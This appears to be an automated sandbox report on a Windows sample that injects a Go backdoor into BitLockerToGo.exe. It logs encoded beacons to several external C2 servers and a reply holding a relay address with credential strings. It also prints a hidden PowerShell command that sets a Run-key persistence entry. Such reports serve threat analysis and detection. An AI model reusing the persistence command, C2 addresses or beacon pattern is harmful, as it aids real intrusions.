                                    Oct 18, 2024 14:10:03.228176117 CEST4986580192.168.2.1046.8.232.106
                                    Oct 18, 2024 14:10:03.228188038 CEST4987180192.168.2.1046.8.236.61
                                    Oct 18, 2024 14:10:33.224648952 CEST4998480192.168.2.1046.8.232.106
                                    Oct 18, 2024 14:10:33.231506109 CEST804998446.8.232.106192.168.2.10
                                    Oct 18, 2024 14:10:33.231751919 CEST4998480192.168.2.1046.8.232.106
                                    Oct 18, 2024 14:10:33.254066944 CEST4998480192.168.2.1046.8.232.106
                                    Oct 18, 2024 14:10:33.266458988 CEST804998446.8.232.106192.168.2.10
                                    Oct 18, 2024 14:10:34.091272116 CEST804998446.8.232.106192.168.2.10
                                    Oct 18, 2024 14:10:34.092755079 CEST4998580192.168.2.1046.8.236.61
                                    Oct 18, 2024 14:10:34.098617077 CEST804998546.8.236.61192.168.2.10
                                    Oct 18, 2024 14:10:34.098742962 CEST4998580192.168.2.1046.8.236.61
                                    Oct 18, 2024 14:10:34.099034071 CEST4998580192.168.2.1046.8.236.61
                                    Oct 18, 2024 14:10:34.104698896 CEST804998546.8.236.61192.168.2.10
                                    Oct 18, 2024 14:10:34.146337032 CEST4998480192.168.2.1046.8.232.106
                                    Oct 18, 2024 14:10:35.096977949 CEST804998546.8.236.61192.168.2.10
                                    Oct 18, 2024 14:10:35.098715067 CEST4998680192.168.2.1093.185.159.253
                                    Oct 18, 2024 14:10:35.104579926 CEST804998693.185.159.253192.168.2.10
                                    Oct 18, 2024 14:10:35.104638100 CEST4998680192.168.2.1093.185.159.253
                                    Oct 18, 2024 14:10:35.104883909 CEST4998680192.168.2.1093.185.159.253
                                    Oct 18, 2024 14:10:35.111268997 CEST804998693.185.159.253192.168.2.10
                                    Oct 18, 2024 14:10:35.152506113 CEST4998580192.168.2.1046.8.236.61
                                    Oct 18, 2024 14:10:35.996009111 CEST804998693.185.159.253192.168.2.10
                                    Oct 18, 2024 14:10:35.997585058 CEST4998780192.168.2.1091.212.166.91
                                    Oct 18, 2024 14:10:36.002605915 CEST804998791.212.166.91192.168.2.10
                                    Oct 18, 2024 14:10:36.002708912 CEST4998780192.168.2.1091.212.166.91
                                    Oct 18, 2024 14:10:36.002914906 CEST4998780192.168.2.1091.212.166.91
                                    Oct 18, 2024 14:10:36.008302927 CEST804998791.212.166.91192.168.2.10
                                    Oct 18, 2024 14:10:36.050441980 CEST4998680192.168.2.1093.185.159.253
                                    Oct 18, 2024 14:10:37.898828983 CEST804998791.212.166.91192.168.2.10
                                    Oct 18, 2024 14:10:37.902573109 CEST4998680192.168.2.1093.185.159.253
                                    Oct 18, 2024 14:10:37.902594090 CEST4998580192.168.2.1046.8.236.61
                                    Oct 18, 2024 14:10:37.902631998 CEST4998480192.168.2.1046.8.232.106
                                    Oct 18, 2024 14:10:37.902916908 CEST4998823961192.168.2.10109.172.88.38
                                    Oct 18, 2024 14:10:37.915612936 CEST2396149988109.172.88.38192.168.2.10
                                    Oct 18, 2024 14:10:37.915636063 CEST804998693.185.159.253192.168.2.10
                                    Oct 18, 2024 14:10:37.915647030 CEST804998546.8.236.61192.168.2.10
                                    Oct 18, 2024 14:10:37.915715933 CEST4998823961192.168.2.10109.172.88.38
                                    Oct 18, 2024 14:10:37.915750980 CEST4998680192.168.2.1093.185.159.253
                                    Oct 18, 2024 14:10:37.915770054 CEST4998580192.168.2.1046.8.236.61
                                    Oct 18, 2024 14:10:37.916765928 CEST804998446.8.232.106192.168.2.10
                                    Oct 18, 2024 14:10:37.916822910 CEST4998480192.168.2.1046.8.232.106
                                    Oct 18, 2024 14:10:37.947853088 CEST4998780192.168.2.1091.212.166.91
                                    Oct 18, 2024 14:10:38.691574097 CEST2396149988109.172.88.38192.168.2.10
                                    Oct 18, 2024 14:10:38.691903114 CEST4998823961192.168.2.10109.172.88.38
                                    Oct 18, 2024 14:10:38.696888924 CEST2396149988109.172.88.38192.168.2.10
                                    Oct 18, 2024 14:10:53.708214045 CEST4998823961192.168.2.10109.172.88.38
                                    Oct 18, 2024 14:10:53.713109016 CEST2396149988109.172.88.38192.168.2.10
                                    Oct 18, 2024 14:10:58.694020987 CEST2396149988109.172.88.38192.168.2.10
                                    Oct 18, 2024 14:10:58.694402933 CEST4998823961192.168.2.10109.172.88.38
                                    Oct 18, 2024 14:10:58.700154066 CEST2396149988109.172.88.38192.168.2.10
                                    Oct 18, 2024 14:11:07.913865089 CEST4998780192.168.2.1091.212.166.91
                                    Oct 18, 2024 14:11:07.918652058 CEST804998791.212.166.91192.168.2.10
                                    Oct 18, 2024 14:11:07.929702997 CEST4998823961192.168.2.10109.172.88.38
                                    Oct 18, 2024 14:11:07.934716940 CEST2396149988109.172.88.38192.168.2.10
                                    Oct 18, 2024 14:11:08.196218014 CEST2396149988109.172.88.38192.168.2.10
                                    Oct 18, 2024 14:11:08.244035006 CEST4998823961192.168.2.10109.172.88.38
                                    Oct 18, 2024 14:11:18.960143089 CEST2396149988109.172.88.38192.168.2.10
                                    Oct 18, 2024 14:11:18.960397959 CEST4998823961192.168.2.10109.172.88.38
                                    Oct 18, 2024 14:11:18.965605974 CEST2396149988109.172.88.38192.168.2.10
                                    Oct 18, 2024 14:11:33.976614952 CEST4998823961192.168.2.10109.172.88.38
                                    Oct 18, 2024 14:11:33.982398987 CEST2396149988109.172.88.38192.168.2.10
                                    Oct 18, 2024 14:11:37.929724932 CEST4998780192.168.2.1091.212.166.91
                                    Oct 18, 2024 14:11:37.935852051 CEST804998791.212.166.91192.168.2.10
                                    Oct 18, 2024 14:11:38.211052895 CEST4998823961192.168.2.10109.172.88.38
                                    Oct 18, 2024 14:11:38.216070890 CEST2396149988109.172.88.38192.168.2.10
                                    Oct 18, 2024 14:11:38.476823092 CEST2396149988109.172.88.38192.168.2.10
                                    Oct 18, 2024 14:11:38.524518967 CEST4998823961192.168.2.10109.172.88.38
                                    Oct 18, 2024 14:11:39.227190018 CEST2396149988109.172.88.38192.168.2.10
                                    Oct 18, 2024 14:11:39.227447987 CEST4998823961192.168.2.10109.172.88.38
                                    Oct 18, 2024 14:11:39.235403061 CEST2396149988109.172.88.38192.168.2.10
                                    Oct 18, 2024 14:11:54.244441986 CEST4998823961192.168.2.10109.172.88.38
                                    Oct 18, 2024 14:11:54.250402927 CEST2396149988109.172.88.38192.168.2.10
                                    Oct 18, 2024 14:11:59.505819082 CEST2396149988109.172.88.38192.168.2.10
                                    Oct 18, 2024 14:11:59.535418987 CEST4998823961192.168.2.10109.172.88.38
                                    Oct 18, 2024 14:11:59.545139074 CEST2396149988109.172.88.38192.168.2.10
                                    Oct 18, 2024 14:12:07.903255939 CEST4998780192.168.2.1091.212.166.91
                                    Oct 18, 2024 14:12:07.909077883 CEST804998791.212.166.91192.168.2.10
                                    Oct 18, 2024 14:12:07.909164906 CEST4998780192.168.2.1091.212.166.91
                                    Oct 18, 2024 14:12:08.466655970 CEST4998823961192.168.2.10109.172.88.38
                                    Oct 18, 2024 14:12:08.471712112 CEST2396149988109.172.88.38192.168.2.10
                                    Oct 18, 2024 14:12:08.732320070 CEST2396149988109.172.88.38192.168.2.10
                                    Oct 18, 2024 14:12:08.780383110 CEST4998823961192.168.2.10109.172.88.38
                                    Oct 18, 2024 14:12:19.806528091 CEST2396149988109.172.88.38192.168.2.10
                                    Oct 18, 2024 14:12:19.808826923 CEST4998823961192.168.2.10109.172.88.38
                                    Oct 18, 2024 14:12:19.814034939 CEST2396149988109.172.88.38192.168.2.10
                                    Oct 18, 2024 14:12:34.825177908 CEST4998823961192.168.2.10109.172.88.38
                                    Oct 18, 2024 14:12:34.832405090 CEST2396149988109.172.88.38192.168.2.10
                                    • 46.8.232.106
                                    • 46.8.236.61
                                    • 93.185.159.253
                                    • 91.212.166.91
                                    • 188.130.206.243
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.104986546.8.232.106807660C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 18, 2024 14:09:58.824002028 CEST298OUTPOST / HTTP/1.1
                                    Host: 46.8.232.106
                                    User-Agent: Go-http-client/1.1
                                    Content-Length: 162
                                    X-Api-Key: oFbfsa5f
                                    Accept-Encoding: gzip
                                    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                    Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                    Oct 18, 2024 14:09:59.688499928 CEST183INHTTP/1.1 429 Too Many Requests
                                    Content-Type: text/plain; charset=utf-8
                                    X-Content-Type-Options: nosniff
                                    Date: Fri, 18 Oct 2024 12:09:59 GMT
                                    Content-Length: 18
                                    Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                    Data Ascii: Too many requests


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.104987146.8.236.61807660C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 18, 2024 14:09:59.696902990 CEST297OUTPOST / HTTP/1.1
                                    Host: 46.8.236.61
                                    User-Agent: Go-http-client/1.1
                                    Content-Length: 162
                                    X-Api-Key: 37YvrW9O
                                    Accept-Encoding: gzip
                                    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                    Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                    Oct 18, 2024 14:10:00.547857046 CEST183INHTTP/1.1 429 Too Many Requests
                                    Content-Type: text/plain; charset=utf-8
                                    X-Content-Type-Options: nosniff
                                    Date: Fri, 18 Oct 2024 12:10:00 GMT
                                    Content-Length: 18
                                    Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                    Data Ascii: Too many requests


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.104987793.185.159.253807660C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 18, 2024 14:10:00.557034016 CEST300OUTPOST / HTTP/1.1
                                    Host: 93.185.159.253
                                    User-Agent: Go-http-client/1.1
                                    Content-Length: 162
                                    X-Api-Key: QiaIdRmS
                                    Accept-Encoding: gzip
                                    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                    Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                    Oct 18, 2024 14:10:01.431174994 CEST183INHTTP/1.1 429 Too Many Requests
                                    Content-Type: text/plain; charset=utf-8
                                    X-Content-Type-Options: nosniff
                                    Date: Fri, 18 Oct 2024 12:10:01 GMT
                                    Content-Length: 18
                                    Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                    Data Ascii: Too many requests


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.104988391.212.166.91807660C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 18, 2024 14:10:01.439162016 CEST299OUTPOST / HTTP/1.1
                                    Host: 91.212.166.91
                                    User-Agent: Go-http-client/1.1
                                    Content-Length: 162
                                    X-Api-Key: 36RdBXl3
                                    Accept-Encoding: gzip
                                    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                    Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                    Oct 18, 2024 14:10:02.354288101 CEST183INHTTP/1.1 429 Too Many Requests
                                    Content-Type: text/plain; charset=utf-8
                                    X-Content-Type-Options: nosniff
                                    Date: Fri, 18 Oct 2024 12:10:02 GMT
                                    Content-Length: 18
                                    Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                    Data Ascii: Too many requests


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    4192.168.2.1049889188.130.206.243807660C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 18, 2024 14:10:02.360979080 CEST301OUTPOST / HTTP/1.1
                                    Host: 188.130.206.243
                                    User-Agent: Go-http-client/1.1
                                    Content-Length: 162
                                    X-Api-Key: 6SlWWgIp
                                    Accept-Encoding: gzip
                                    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                    Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                    Oct 18, 2024 14:10:03.221941948 CEST183INHTTP/1.1 429 Too Many Requests
                                    Content-Type: text/plain; charset=utf-8
                                    X-Content-Type-Options: nosniff
                                    Date: Fri, 18 Oct 2024 12:10:03 GMT
                                    Content-Length: 18
                                    Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                    Data Ascii: Too many requests


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    5192.168.2.104998446.8.232.106807660C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 18, 2024 14:10:33.254066944 CEST298OUTPOST / HTTP/1.1
                                    Host: 46.8.232.106
                                    User-Agent: Go-http-client/1.1
                                    Content-Length: 162
                                    X-Api-Key: y7m7E0Nk
                                    Accept-Encoding: gzip
                                    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                    Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                    Oct 18, 2024 14:10:34.091272116 CEST183INHTTP/1.1 429 Too Many Requests
                                    Content-Type: text/plain; charset=utf-8
                                    X-Content-Type-Options: nosniff
                                    Date: Fri, 18 Oct 2024 12:10:33 GMT
                                    Content-Length: 18
                                    Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                    Data Ascii: Too many requests


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    6192.168.2.104998546.8.236.61807660C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 18, 2024 14:10:34.099034071 CEST297OUTPOST / HTTP/1.1
                                    Host: 46.8.236.61
                                    User-Agent: Go-http-client/1.1
                                    Content-Length: 162
                                    X-Api-Key: wUWI0IPD
                                    Accept-Encoding: gzip
                                    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                    Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                    Oct 18, 2024 14:10:35.096977949 CEST183INHTTP/1.1 429 Too Many Requests
                                    Content-Type: text/plain; charset=utf-8
                                    X-Content-Type-Options: nosniff
                                    Date: Fri, 18 Oct 2024 12:10:34 GMT
                                    Content-Length: 18
                                    Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                    Data Ascii: Too many requests


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    7192.168.2.104998693.185.159.253807660C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 18, 2024 14:10:35.104883909 CEST300OUTPOST / HTTP/1.1
                                    Host: 93.185.159.253
                                    User-Agent: Go-http-client/1.1
                                    Content-Length: 162
                                    X-Api-Key: HhKpq2Ju
                                    Accept-Encoding: gzip
                                    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                    Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                    Oct 18, 2024 14:10:35.996009111 CEST183INHTTP/1.1 429 Too Many Requests
                                    Content-Type: text/plain; charset=utf-8
                                    X-Content-Type-Options: nosniff
                                    Date: Fri, 18 Oct 2024 12:10:35 GMT
                                    Content-Length: 18
                                    Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                    Data Ascii: Too many requests


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    8192.168.2.104998791.212.166.91807660C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 18, 2024 14:10:36.002914906 CEST299OUTPOST / HTTP/1.1
                                    Host: 91.212.166.91
                                    User-Agent: Go-http-client/1.1
                                    Content-Length: 162
                                    X-Api-Key: qVSrzg77
                                    Accept-Encoding: gzip
                                    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                    Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                    Oct 18, 2024 14:10:37.898828983 CEST554INHTTP/1.1 200 OK
                                    Date: Fri, 18 Oct 2024 12:10:37 GMT
                                    Content-Length: 436
                                    Content-Type: text/plain; charset=utf-8
                                    Data Raw: 31 30 39 2e 31 37 32 2e 38 38 2e 33 38 3b 32 33 39 36 31 3b 68 75 62 58 74 71 4c 36 74 4c 52 5a 70 4d 77 72 3a 71 45 4c 2f 66 72 47 2f 36 45 61 34 66 55 53 36 31 66 71 2e 30 43 6a 38 62 5a 32 2e 61 66 66 32 32 68 6a 33 36 4c 31 32 5a 49 4d 2e 38 33 5a 31 56 4a 6b 30 74 78 32 36 57 65 54 2c 41 71 42 68 54 35 67 74 62 69 48 74 30 61 6f 70 64 77 55 3a 41 66 78 2f 68 54 67 2f 61 65 34 34 46 36 73 36 4b 68 47 2e 53 6f 52 38 62 70 41 2e 5a 6d 45 32 45 63 39 33 67 58 30 36 51 44 42 2e 47 32 4b 36 4f 7a 57 31 51 65 6a 2c 6d 67 50 68 4d 32 72 74 51 39 6a 74 56 58 45 70 44 4a 53 3a 62 78 72 2f 69 67 64 2f 77 43 79 39 6d 74 6a 33 4a 6d 4f 2e 68 5a 66 31 43 51 73 38 77 44 30 35 62 62 76 2e 72 79 74 31 39 78 44 35 46 6a 38 39 33 68 75 2e 46 70 5a 32 48 50 47 35 75 39 42 33 4f 68 6e 2c 57 30 37 68 6a 49 70 74 6b 78 46 74 6d 71 4f 70 78 76 4a 3a 35 6e 53 2f 59 61 57 2f 52 61 6b 39 39 64 65 31 56 33 75 2e 55 48 6c 32 68 62 64 31 50 58 45 32 74 37 37 2e 59 33 70 31 68 62 52 36 36 4e 48 36 4d 65 6c 2e 62 76 64 39 54 [TRUNCATED]
                                    Data Ascii: 109.172.88.38;23961;hubXtqL6tLRZpMwr:qEL/frG/6Ea4fUS61fq.0Cj8bZ2.aff22hj36L12ZIM.83Z1VJk0tx26WeT,AqBhT5gtbiHt0aopdwU:Afx/hTg/ae44F6s6KhG.SoR8bpA.ZmE2Ec93gX06QDB.G2K6OzW1Qej,mgPhM2rtQ9jtVXEpDJS:bxr/igd/wCy9mtj3JmO.hZf1CQs8wD05bbv.ryt19xD5Fj893hu.FpZ2HPG5u9B3Ohn,W07hjIptkxFtmqOpxvJ:5nS/YaW/Rak99de1V3u.UHl2hbd1PXE2t77.Y3p1hbR66NH6Mel.bvd9TNd1hTP,dEZh4ONtR1jtf7Upvqq:9g4/B41/8Vo1Ash8G3W8d2c.4ku182i3p6P0Lyr.l6s2jMs0AdR6F5y.fYo2WwY4o7Z388L
                                    Oct 18, 2024 14:11:07.913865089 CEST6OUTData Raw: 00
                                    Data Ascii:
                                    Oct 18, 2024 14:11:37.929724932 CEST6OUTData Raw: 00
                                    Data Ascii:


                                    Click to jump to process

                                    Click to jump to process

                                    Click to dive into process behavior distribution

                                    Click to jump to process

                                    Target ID:0
                                    Start time:08:09:28
                                    Start date:18/10/2024
                                    Path:C:\Users\user\Desktop\BwqqVoHR71.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\BwqqVoHR71.exe"
                                    Imagebase:0x40000
                                    File size:19'172'088 bytes
                                    MD5 hash:0A21A94198F6157ABB36BF55CB43BE27
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Target ID:2
                                    Start time:08:09:39
                                    Start date:18/10/2024
                                    Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                    Imagebase:0x2d0000
                                    File size:231'736 bytes
                                    MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_GOBackdoor, Description: Yara detected GO Backdoor, Source: 00000002.00000002.3158908569.000000000C008000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:moderate
                                    Has exited:false

                                    Target ID:4
                                    Start time:08:09:46
                                    Start date:18/10/2024
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }"
                                    Imagebase:0x3f0000
                                    File size:433'152 bytes
                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:08:09:46
                                    Start date:18/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff620390000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:6
                                    Start time:08:10:00
                                    Start date:18/10/2024
                                    Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                    Imagebase:0x2d0000
                                    File size:231'736 bytes
